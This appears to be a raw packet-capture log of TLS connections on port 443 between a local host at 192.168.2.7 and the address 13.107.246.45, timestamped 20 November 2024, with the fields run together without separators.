                                                                                                                                                                                                Nov 20, 2024 10:54:36.593172073 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.675796032 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.676831961 CET49834443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.676831961 CET49834443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.676851988 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.676862001 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.678076029 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.678736925 CET49835443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.678766012 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.679080963 CET49835443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.679086924 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.683491945 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.683674097 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.683733940 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.686261892 CET49832443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.686261892 CET49832443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.686290026 CET49832443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.686304092 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.689059973 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.689110041 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.689301014 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.689301014 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.689337015 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.693871975 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.694376945 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.698384047 CET49833443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.698384047 CET49833443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.698438883 CET49833443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.698456049 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.700570107 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.700606108 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.702713013 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.702941895 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.702955008 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785468102 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785538912 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785584927 CET49834443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785742044 CET49834443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785752058 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785764933 CET49834443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.785770893 CET4434983413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.786442995 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.786794901 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.787111998 CET49835443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.787256956 CET49835443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.787276030 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.787291050 CET49835443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.787297010 CET4434983513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789191008 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789213896 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789294004 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789417982 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789433002 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789690018 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789716959 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789774895 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789855957 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.789872885 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.840224981 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.856911898 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.856929064 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.857372999 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.857377052 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.962405920 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.962707043 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.962747097 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.962865114 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.962865114 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.963100910 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.963109016 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.963124990 CET49836443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.963130951 CET4434983613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.965707064 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.965727091 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.965806007 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.965939045 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.965951920 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.352323055 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.359467983 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.359478951 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.360143900 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.360153913 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.370695114 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.384186029 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.384212017 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.384839058 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.384845018 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.425657988 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.427056074 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.434010983 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.434022903 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.434799910 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.434804916 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.435092926 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.435106993 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.435619116 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.435622931 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.457967997 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.458605051 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.458636999 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.458725929 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.490489006 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.490653038 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.490705967 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503328085 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503341913 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503355980 CET49838443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503362894 CET4434983813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503478050 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503478050 CET49837443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503490925 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.503499985 CET4434983713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.509999990 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.510024071 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.510266066 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.511764050 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.511780024 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.512085915 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.512104988 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.512192011 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.512301922 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.512317896 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.530111074 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.530337095 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.530369997 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.530380964 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.530412912 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.531265974 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.535675049 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.535696030 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.535706997 CET49840443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.535711050 CET4434984013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.542437077 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.544137001 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.552160025 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.552169085 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.552177906 CET49839443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.552182913 CET4434983913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.620893002 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.674170017 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.690920115 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.690946102 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.691123962 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.695318937 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.695332050 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.699659109 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.699665070 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.800357103 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.800419092 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.800470114 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.839904070 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.839915037 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.841569901 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.841586113 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.841681957 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.841761112 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.841770887 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.843055964 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.843067884 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.843080997 CET49841443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.843086958 CET4434984113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.890816927 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.890832901 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:37.890935898 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.930617094 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:37.930639029 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.166428089 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.167159081 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.167190075 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.167581081 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.167587996 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.198060036 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.198575974 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.198601007 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.199035883 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.199039936 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.270431042 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.270486116 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.270528078 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.270531893 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.270580053 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.271209955 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.271224976 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.271234989 CET49843443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.271239996 CET4434984313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.275360107 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.275398016 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.275458097 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.277441025 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.277457952 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.308525085 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.308665991 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.308737040 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.318116903 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.318116903 CET49842443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.318192959 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.318209887 CET4434984213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.362560987 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.362591028 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.362694025 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.363152027 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.363164902 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.524893999 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.526397943 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.526416063 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.526974916 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.526979923 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.532329082 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.532788038 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.532813072 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.533297062 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.533302069 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.564012051 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.564677000 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.564688921 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.565274000 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.565279007 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638717890 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638783932 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638818026 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638859987 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638919115 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.638920069 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639142036 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639215946 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639307976 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639327049 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639339924 CET49845443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.639345884 CET4434984513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.640130997 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.640130997 CET49844443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.640142918 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.640146971 CET4434984413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.642702103 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.642733097 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.643034935 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.643842936 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.643882036 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.643950939 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.644264936 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.644268990 CET49849443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.644282103 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.644284010 CET4434984913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.664316893 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.664539099 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.664597988 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.664624929 CET49846443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.664629936 CET4434984613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.667577982 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.667589903 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.667653084 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.667850018 CET49851443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.667860031 CET4434985113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.914572001 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.915186882 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.915216923 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:38.915647984 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:38.915652990 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.010040998 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.010658026 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.010679960 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.011117935 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.011122942 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.014805079 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.015110016 CET4434984713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.015240908 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.015240908 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.015240908 CET49847443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.018266916 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.018331051 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.018446922 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.018640041 CET49852443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.018659115 CET4434985213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.110632896 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.110796928 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.110842943 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.110876083 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.110932112 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.111335993 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.111350060 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.111360073 CET49848443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.111365080 CET4434984813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.114289045 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.114322901 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.114427090 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.114563942 CET49853443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.114581108 CET4434985313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.278860092 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.279840946 CET49850443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:39.279864073 CET4434985013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:39.280314922 CET49850443192.168.2.713.107.246.45
